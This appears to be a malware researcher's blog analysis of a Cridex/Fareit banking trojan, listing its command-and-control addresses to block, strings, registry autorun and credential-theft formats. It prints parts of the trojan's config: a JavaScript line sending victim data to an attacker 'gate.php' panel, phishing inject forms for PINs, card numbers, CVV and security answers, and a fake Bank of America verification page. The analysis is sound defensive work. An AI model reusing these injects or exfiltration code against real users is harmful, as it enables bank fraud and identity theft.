Local\XME%08X
Local\XMM%08X
Local\XMI%08X
Software\Microsoft\Windows NT\S%08X
Software\Microsoft\Windows NT\C%08X
  :
So we know that about.exe is responsible for autorun by:

NSoftware\Microsoft\Windows\CurrentVersion\Run
And also responsible for making calls to mothership:

h00p://140.123.101.4:8080
h00p://182.237.17.180:8080
h00p://220.86.69.55:8080
h00p://221.143.48.6:8080
h00p://64.85.53.168:8080
h00p://163.23.107.65:8080
h00p://210.56.23.100:8080
h00p://173.245.3.182:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://97.74.113.229:8080
h00p://62.28.244.251:8080
h00p://69.64.89.82:8080
h00p://38.99.150.69:8080
h00p://174.142.68.239:8080
h00p://78.28.120.32:8080
h00p://88.119.156.20:8080
h00p://188.117.44.241:8080
h00p://217.65.100.41:8080
↑BLOCK THESE!!!
You can unpack the binary to see the similar result, as per
unpacked one I see here:

This binary also the brain of the drops of KB00777165.exe:

sKB%08d.exe
KB00777165.exe
C:\Documents and Settings\rik\Application Data // directory made strings..
C:\Documents and Settings\rik\Application Data\KB00777165.exe // the drops..
And also its execution traces command too:

exec
cmd
"%s" /c "%s"
The batch file command used to delete the temporary binary file:

@echo off
del /F /Q /A "%S"
if exist "%S" goto R
del /F /Q /A "%S"
We know how it connect/to mothership:

%u.%u.%u.%u:%u
POST
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
application/x-www-form-urlencoded
type
UNKNOWN
USER
PASS
Some botnet command used

settings
commands
hash
httpshots
formgrabber
redirects
bconnect
httpinjects
  :
setsockopt
ioctlsocket
socket
closesocket
select
recv
send
connect
freeaddrinfo
getaddrinfo
This is the all details of the method used to send data to remote host:

GET
POST
HTTP/1.0
HTTP/1.1
multipart/form-data
boundary=
Content-Disposition
name="
filename="
Content-Type
text/
Host
Referer
User-Agent
Authorization
Accept-Encoding
Content-Length
If-Modified-Since
If-None-Match
https
Transfer-Encoding
Connection
modify
pattern
replacement
httpinject
conditions
actions
redirect
process
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<style>.d{font-weight:bold;margin:5px}.f{margin:5px}</style>
<div class="d"><a href="/%S">[%S]</a></div>
<div class="f"><a href="/%S">%S</a></div>
Content-Disposition: attachment; filename=%S
↑it looks like this time the file attachment API exists..
And this is the scary parts of the format of credentials:

<http time="%%%uu">
    <url>
        <![CDATA["%%.%us"]]>
    </url>
    <useragent>
        <![CDATA["%%.%us"]]>
    </useragent>
    <data>
        <![CDATA[ ]]>
    </data>
</http>
<httpshot time="%%%uu">
    <url>
        <![CDATA["%%.%us"]]>
    </url>
    <data>
        <![CDATA[ ]]>
    </data>
</httpshot>
<ftp time="%%%uu">
    <server>
        <![CDATA["%%u.%%u.%%u.%%u:%%u"]]>
    </server>
    <user>
        <![CDATA[%%.%us]]>
    </user>
    <pass>
        <![CDATA[ ]]>
    </pass>
</ftp>
<pop3 time="%%%uu">
    <server>
        <![CDATA["%%u.%%u.%%u.%%u:%%u"]]>
    </server>
    <user>
        <![CDATA[%%.%us]]>
    </user>
    <pass>
        <![CDATA[ ]]>
    </pass>
</pop3>
<cmd id="%u">%u</cmd>
<cert time="%u">
    <pass>
        <![CDATA[ ]]>
    </pass>
    <data>
        <![CDATA[ ]]>
    </data>
</cert>
<ie time="%u">
    <data>
        <![CDATA[ ]]>
    </data>
</ie>
<ff time="%u">
    <data>
        <![CDATA[ ]]>
    </data>
</ff>
<mm time="%u">
    <data>
        <![CDATA[ ]]>
    </data>
</mm>
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
    <header>
        <unique>%%.%us</unique>
        <version>%%u</version>
        <system>%%u</system>
        <network>%%u</network>
    </header>
<data>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB</data>
</message>
PS: these moronz has the ACL too:

url
allow
deny
We know now that the binary was encypted some of the famous used 
malware dlls like ws2_32.dll with the complete list below:

"cabinet.dll
ssl3.dll
nspr4.dll
wininet.dll
ws2_32.dll
secur32.dll"
kernel32.dll
ntdll.dll
SHLWAPI.dll
ADVAPI32.dll
SHELL32.dll
*)↑The marked DLL was obfuscated in encryption can't be seen soon
wihout decrypting the binary section will be impossible to be seen.
Which contains the calls below:

FCIDestroy
FCIFlushFolder
FCIFlushCabinet
FCIAddFile
FCICreate
SSL_ImportFD
PR_Close
PR_Poll
PR_Read
PR_Write
PR_SetError
PR_Connect
PR_GetError
InternetWriteFile
InternetSetOptionW
InternetReadFile
InternetQueryOptionW
InternetOpenW
InternetCrackUrlW
InternetConnectW
InternetCloseHandle
HttpSendRequestExW
HttpQueryInfoA
HttpOpenRequestW
HttpEndRequestW
CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore
__WSAFDIsSet
WSAIoctl
WSARecv
WSASend
WSAGetLastError
WSASetLastError
DeleteSecurityContext
DecryptMessage
EncryptMessage
InitializeSecurityContextW
InitializeSecurityContextA
IsWow64Process
RtlRandom
RtlTimeToSecondsSince1970
NtResumeThread
NtQueueApcThread
NtQueryInformationThread
NtQuerySystemInformation
RtlZeroMemory
RtlFillMemory
RtlCompareMemory
LdrLoadDll
*) The other calls is as per seen in plain text in binary

I also found that my PC name was included in the data:

USER-1379CF37C25_9455E50D0B2D20CB
And this parts are encrypted data:

;C<R<k<
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<
3&353L3U3m3{3
6G6U6c6
7-8F8P8n8{8
:/:::E:K:c:j:t:
?5?H?c?h?q?z?
0&0F0P0f0p0
2X2]2f2o2u2
<0=:=R=\=c=j=
878=8D8U8^8g8p8x8
:':D:N:h:
<'<T<e<o<
=!=(=:=@=V=b=z=
11181A1G1N1[1d1m1{1
2&232>2F2U2a2h2q2w2~2
303<3N3_3i3r3
3Q4X4^4e4t4z4
7-7^7d7o7y7
8&8,868]8d8k8q8
9!9/9=9C9N9X9c9i9s9y9
=+=0=8=F=L=Q=W=[=a=
?!?'?I?V?i?
0<0O0U0q0w0
1[1i1s1x1
2*2I2f2t2
5&5,585>5E5K5U5[5f5p5{5
5B6G6M6W6e6k6u6~6
7+73787J7O7`7k7r7
848G8S8b8l8t8{8
<?=J=Q=j=~=
3&3<3L3n3?4l4v4
797C7N7X7o7
:!:(:.:A:l:u:
<0<;<B<N<S<Y<q<w<
?*?2?B?K?P?\?n?
141?1I1f1l1r1
2'2-2B2H2Y2b2i2u2
5,525R5e5o5|5
6!7(7H7N7V7\7f7k7q7w7|7
9$9*9A9G9N9\9c9h9
;&;2;8;>;J;V;d;i;
<3<U<b<i<r<
?1?E?O?f?o?
1M1U1e1m1|1
2"2.2B2U2_2v2
3 3*3A3J3o3x3
4%4J4S4g4
7 7*787<7@7D7H7L7P7T7n7t7
8>8R8`8i8n8x8
:':-:;:A:K:Q:\:f:q:|:
1C2g2p2
4+444=4K4R4l4
>%>+>G>M>W>s>
;$;/;9;D;L;V;a;i;};
<"<(<-<C<K<Q<V<l<t<z<
(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<1@1D1P1T1X1\1`1d1h1l1p1t1x1|1
2 2$2(2,2024282<2@2D2P2T2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3
3P4T4X4
7p8t8x8
9 9h9l9p9
:
I'll try to decode it later..


In KB00777165.exe.exe I found..

Trace of compilation of the malware maker :-D

E:\FutureCode\Reverted\Samples\Id0120112309\Signal[93].exe

And decrypted keywords like, looks like the panel password to me ;-)

Ninedourb
letrayohs
dagpishalb
HoweGaffgutley
oiEmusJudoSabe
muetaecutryes
nitearMiltaa
dinPisoagonob
paDrumnacarIzar
logoxkaunarinod
houhmocSashinlo
aamyokaGoutoenu
warSkewsibsMuni
shoutagbesnahpi
Alsoutscwmti
LorewasifOils
Nansratoworngor
OuchDiel
JestGorpamemeas
odagssicHullgo
aeisledoemopcoo
hidawmap
leubaachidor
DeltweRearrob
Oatszaod
and...
we have an encrypted calls like:

sh&awpki
reasMayapee&s
senrevet&enick
z&oybio
fidabUnt&un
karigL&rdbe
Mumu&inemlat
jet&tssec
Jaggoyg&y
NewsCu&fcatsan
Ko&kJustpea
wehmup&na
neShogJut&mud
mao&Jogsmil
Beanr&cjog
Leapmaeesr&x
mugcome&pp
Whapm&vetae
alla&Farocur
amox&agemsrag
bize&pet
aidtenSh&hla
dyeaa&ep
Coysmiemmit&b
&ffefreuhbome
  :
Same encryption used since the other hashed data are so similar.


The registry.

I mentioned the autorun to be put in registry in the above section,
thus this big blobs in the registry below:

HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\
Microsoft\Windows NT\SD5809E24\: 3C 73 65 74 74 69 6E 67 73 20 68 
61 73 68 3D 22 30 63 35 32 30 62 36 61 35 36 66 38 61 37 33 63 38 
65 66 31 61 65 39 30 37 65 64 65 63 34 34 64 36 64 38 63 61 36 64 
34 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 
65 3D 22 64 65 6E 79 22 3E 5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C 
   :
(very loong blob...)
   :
20 20 20 72 65 74 75 72 6E 20 74 72 75 65 3B 0A 7D 0A 0A 0A 3C 2F 
73 63 72 69 70 74 3E 0A 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 
6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 
3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 
65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E

Comment: This is actually the config of the PWS Fareit trojan..
You can see it neutralized in here -->>[PASTEBIN]
It contains the evil things like online banking data grabber, 
phishing forms, (in this case AmericanExpress etc), with the details
that you can learn by my previous analysis here -->>[LINK]

In that config form was written the CnC at:

<bconnect>"85,143.166.72:443"</bconnect>
<![CDATA["h00p://85.143.166.141/mx/3A/in/cp.php?h=8"]]>

And the portal/panel at below to send phishing data.

var adminPanelLocation = 'h00p://62,76.177.123/if_Career/';
var d = adminPanelLocation + 'gate.php?done=1&bid=USER-1379CF37C25_9455E50D0B2D20CB&info='+info+'&rkey=' + Math['random']();
↑BLOCK THESE!!!


Phishing Trace

If you just run the config file in the browser you'll see the 
phishing form traces like per below snapshot:


Below are details of attempt to steal your personal information (phishing):

Attempt to steal the PIN:

<!--Personal security PIN-->
   :
 <div id="div_ps_pin" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">
  Personal security PIN:</font></td></div>
<td><div id="div_pininp" style =" padding:1px;">
<input type="text" class="amountfield"   id="ps_pin" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" 
  name="ps_pin"     maxlength=4 >
</div>

Attempt to steal Mother's Maiden Name:

<div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">
   Mother's Maiden Name:</font></td></div>
<td><div id="div_pininp" style =" padding:1px;">
<input type="text" class="amountfield"    
  id="exp_mm" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" 
  name="mmn"   ></div>

Place of birth (POB)

<div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">
  Place of birth:</font></td></div>
<td><div id="div_pob" style =" padding:1px;">
<input type="text" class="amountfield"    id="pob" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" 
  name="pob"   >

Date of birth

<div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">
  Date of birth:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
<input type="text"  class="amountfield"  id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" 
  name="dob_mm"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
<input type="text" class="amountfield"   id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" 
  name="dob_dd"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
<input type="text" class="amountfield"   id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" 
  name="dob_yy"     maxlength=4 >

Mother Date of birth

<div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">
   Mother Date of birth:</font></td></div>
<td><div id="div_pininp" style =" padding:1px;">
<input type="text"  class="amountfield"  id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" 
name="mdob_mm"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
<input type="text" class="amountfield"   id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" 
name="mdob_dd"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
<input type="text" class="amountfield"   id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" 
name="mdob_yy"     maxlength=4 >
Also privacy related data phished like:

<option value="1">What is the name of the city where your father was born?</option>
<option value="2">What is the name of the hospital in which you were born?</option>      
<option value="3">What was the name of your first pet?</option>          
<option value="4">What was the first name of your first true love?</option>          
<option value="6">What was the first music album that you bought?</option>              
<option value="7">what is the last name of your homeroom teacher in 10th grade?</option>              
<option value="8">In which city do you want to retire?</option>              
<option value="9">What is the name of the city where your mother was born?</option>              
<option value="10">What is of the name the city where your parents met?</option>                  
<option value="11">What is your youngest sibling\'s middle name?</option>                  
<option value="12">What is your oldest sibling\'s middle name?</option>                      
<option value="13">What is your spouse\'s middle name?</option>                      
<option value="14">What is your oldest cousin´s first name?</option>                      
<option value="15">What is your youngest cousin´s first name?</option>                      
<option value="16">Where does your nearest sibling live?</option>                      
<option value="17">What is the name of the school you attended in 8th grade?</option>                      
<option value="18">What was the last name of your 4th grade school teacher?</option>                      
<option value="19">What was the first name of your best friend in high school?</option>                          
<option value="20">What was your childhood nickname?</option>                              
<option value="21">What was your first love\'s first name?</option>                              
<option value="22">In what city did you meet your spouse?</option>                                  
<option value="23">What was the name of your childhood hero?</option>                                  
<option value="24">What is the name of the country you most want to visit?</option>                                  
<option value="25">What is your maternal grandfather\'s first name?</option>                                  
<option value="26">What is your maternal grandmother\'s first name?</option>                                  
<option value="27">What is your paternal grandfather\'s first name?</option>                                      
<option value="28">What is your paternal grandmother\'s first name?</option>                                      
<option value="29">What is the first name of your first boss?</option>                                      
<option value="30">What was the make of your first car?</option>                                      
<option value="31">What was your major in college?</option>                                      
<option value="32">What is your favorite Sports Team?</option>                                      
<option value="33">As a child, what did you want to be when you grew up?</option>                                      
<option value="34">What is your favorite candy?</option>                                      
<option value="35">In what city or town was your first job?</option>                                      
<option value="36">What type of dog do you have?</option>                                          
<option value="37">What is the name of a food that you refuse to eat?</option>

This time the method used to gather url to send to the portal:

var d = adminPanelLocation + // see the CnC part..
       'gate.php?bid=%USER%-1379CF37C25_9455E50D0B2D20CB&location=
       '+encodeURIComponent(window.location)+'&rkey=' + Math['random']();

The bad actors are aiming Bank of America Online this time:

function secondPage() {document.title = 
"Bank of America | Online Banking | Additional verification";
jq('div[class="right-column no-print"]').hide();
jq('h1:contains("Enter your Passcode")').
text('Additional verification of your identity');
jq('p:contains("If your SiteKey is correct")').hide();
jq('p:contains("SiteKey lets you know")').
text('In order to provide you with extra security, 
we occasionally need to ask for additional information 
when you access your accounts online. 
Please enter your card information below.');
          :
 <label>"Card Number"</label><div class="TL_NPI_Pass"><INPUT id=cc name=cc class=tl-private maxLength=16 size=17 type=text></div><br>
 <label>"Exp. Date"</label><div class="TL_NPI_Pass">
<select name="expmm" id="expmm" style="display:inline;">
    <option value="">mm</option>
    <option value="01">01</option>
    <option value="02">02</option>
    <option value="03">03</option>
    <option value="04">04</option>
    <option value="05">05</option>
    <option value="06">06</option>
    <option value="07">07</option>
    <option value="08">08</option>
    <option value="09">09</option>
    <option value="10">10</option>
    <option value="11">11</option>
    <option value="12">12</option>
</select>/
<select name="expyy" id="expyy" style="display:inline;">
    <option value="">yy</option>
    <option value="2012">12</option>
    <option value="2013">13</option>
    <option value="2014">14</option>
    <option value="2015">15</option>
    <option value="2016">16</option>
    <option value="2017">17</option>
    <option value="2018">18</option>
    <option value="2019">19</option>
    <option value="2020">20</option>
    <option value="2021">21</option>
    <option value="2022">22</option>
    <option value="2023">23</option>
    <option value="2024">24</option>
    <option value="2025">25</option>
</select>
<label>CVV2</label><div class="TL_NPI_Pass">
<INPUT style="width:30px;" id=cvv name=cvv class=tl-private maxLength=4
size=4 "type=password">

Like previously, faking the checking of creditcard w/below logic:

function check_cc(cardnumber) {
    var cardNo = cardnumber.replace(/[^0-9]/g, "");
    if (cardNo.length < 15 || cardNo.length > 16) {
        return false;
    }
    var checksum = 0;
    var j = 1;
    var calc;
    for (i = cardNo.length - 1; i >= 0; i--) {
        calc = Number(cardNo.charAt(i)) * j;
        if (calc > 9) {
            checksum = checksum + 1;
            calc = calc - 10;
        }
        checksum = checksum + calc;
        if (j == 1) {
            j = 2;
        } else {
            j = 1;
        }
    }
    if (checksum % 10 != 0) {
        return false;
    }
    return true;
The credential information of below list of online banking
was phished by connecting to the real online url for convincing victim..

jpmorgan\.com/
direct.53.com/
express.53.com/express/logon.jsp
(www\.|)cashanalyzer\.com/
business-eb\.ibanking-services\.com/
businessonline\.tdbank\.com/
businessaccess\.citibank\.citigroup.com/cbusol/signon\.do
ebanking-ch[\d]\.ubs\.com/
 

Malware Phishing Credential Server

This is their phishing server portal, they actually use for this infection case,
see the url and compare it with the report:

Wacked the way in to collect evidence of crime, first level panel:


You see all of the questions asked in the phishing code are recorded, 
together w/passwords.
Second level panel:


↑You're not only got hit once but EVERYTIME you accessed 
the internet to the targeted online banking sites.
How ? Can't say much here, see this:


You still don't believe it? PoC:

It is clearly stated the current infection status:

Total bots: 85
Total finished: 58
Total opened: 332

Through the MalwareMustDie team work, we passed all 
of the data to the FBI for arrest warrant process. Let's give LAW the first chance.


Important memo after reversing & encryption of the payloads

The binaries of about.exe and the dropped KB*.exe is packed,
I will not go to details of unpacking here, but if you do it right
in the about.exe and KB*.exe you'll see the similarities of crypto.
PoC is as per below:

about.exe

KB*.exe

(↑green part is the crypto traces we talked about, yellow: passwords)
The same pattern also detected in the traffic sent (HTTP/1.1 POST)



Network Analysis

I made a long session capturing the traffic data between my TestPC to
the connected botnet, is a long session (1,500+)& will be very good 
if you would like to analyze the traffic of this Cridex/Fareit infection. 
The screenshot:

Since all of the work of this infection already well-explained above, you
can confirm it by seeing the PCAP capture I provide.
You can download it at below Download section :-)

In my test only these connection successfully established to sent credentials:

And the others were HTTP rejected from the remote host:

To be noted these request from Cridex showing the lookup response as per below,
showing the PTR record : (for blocking & incident investigation purpose)



Conclusion - What's new then?


1. The usage of the   encryption is getting deeper, they encrypted the data
   up to the memory level now. 
2. The attempt to avoid capture also detected, the cridex was running about 
   3 sec & following by the KB*.exe which runs for about less than 5mins.
   The cmd was executed in a glimpse, and see my PCAP & file capture data 
   to view the time/speed of this new things. All is just to prevent someone
   making a post like this :-) 
3. More profile capture detected & more phishing sent data template seen.
   Thus now they have the attachment file API code in POST session


Research and Download

For the research and raising detection ratio purpose I share my samples/data:

Complete malware sample download is here -->>[HERE] 
Research/captures data are in here -->>[HERE]

Below is the infected url list + VT urls and URLQuery report links:
(You are safe to click the links :-))

DATE/TIME FLUSHED  MD5                              SIZE    FILENAME      URLQUERY                                  VIRUS TOTAL
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2013/01/26  18:11  d0fe2ce87f933ff73f5ce0c0efadd462     422 info.htm      http://urlquery.net/report.php?id=850246  https://www.virustotal.com/file/1da4c5bf69ae062b525c25538401b9fc6752b0780f4e9494431140350fc74ac9/analysis/1359196122/
2013/01/26  18:21  f1b7f17e653cdedbfc78d3e9fa2bef4d 117,752 column.php    http://urlquery.net/report.php?id=842744  https://www.virustotal.com/file/59ab9f3e6a2cf40f8ce5ff37d5afdc36e68bd9c59facf72b3537adeb178fd105/analysis/1359196138/
2013/01/26  19:15  d60be18003ae07ea165d193db087957b   7,238 flash1.swf    http://urlquery.net/report.php?id=850229  https://www.virustotal.com/file/f41f8102bb2d7b0e7bf97f61332e768d63fb5ccfa35693b5857c23b9e58e9622/analysis/1359196175/
2013/01/26  19:16  a5a1308ee3ca7f75fe85fe4d9a14752f     946 flash2.swf    http://urlquery.net/report.php?id=850230  https://www.virustotal.com/file/3beb8ae0ce0ba1c7a8235d93aefcadded2ab7917414b70ce424836ad0ca4a721/analysis/1359196214/
2013/01/26  19:17  361f6e22e55ca3732d8cbeff43ecb1d4  21,599 infector1.pdf http://urlquery.net/report.php?id=850240  https://www.virustotal.com/file/66fb2a78aaef9b11d1e0adfaa49a81f380248230add1663cb7a75bd263b854e4/analysis/1359196230/
2013/01/26  19:17  ef4c398c0138c3e8adabcdb647b2283b  11,183 infector2.pdf http://urlquery.net/report.php?id=850236  https://www.virustotal.com/file/1fa06ce003b01fbc41b9e959f1d478f3ba56fe367f498921a757255627c67bb0/analysis/1359196247/
2013/01/26  18:23  95c06ae7b26fcbe338532bbaa1e137c4  15,420 java1.jar     http://urlquery.net/report.php?id=842744  https://www.virustotal.com/file/7ef8f67e7e4b39086387570b7fd8de505684b87318e9acccef34e20e0a8122b4/analysis/1359196264/
2013/01/26  18:24  5599f12b1c2ce9c68dc629d013241273  15,592 java2.jar     http://urlquery.net/report.php?id=842744  https://www.virustotal.com/file/63106ebc5076fe6e1c8195a4e5f0dfb35668c0b0334e9e7fa840f4a28ce4830c/analysis/1359196283/
2013/01/26  18:42  9fb4dd1b3e0b6002eff7e6f63a6b6d07  98,304 about.exe     http://urlquery.net/report.php?id=850234  https://www.virustotal.com/file/4ac71ec87577944cfb098b379bd55e9ddc8234cd791d994f621b892d969c699f/analysis/1359193394/
2013/01/26  20:39  b152dacee9c5ca22543fe9e435177496 110,592 KB00777165.exe     -                                    https://www.virustotal.com/file/6a18c125b64f20432f8bb63ab92afcbaf9bc234968c8e8c2b472832877ee35a7/analysis/1359275410/

Stay safe friends! (PS: Thank's to a friend who contribute this nice picture!)
#MalwareMustDie!
Posted by unixfreaxjp at
Subscribe to: Posts (Atom)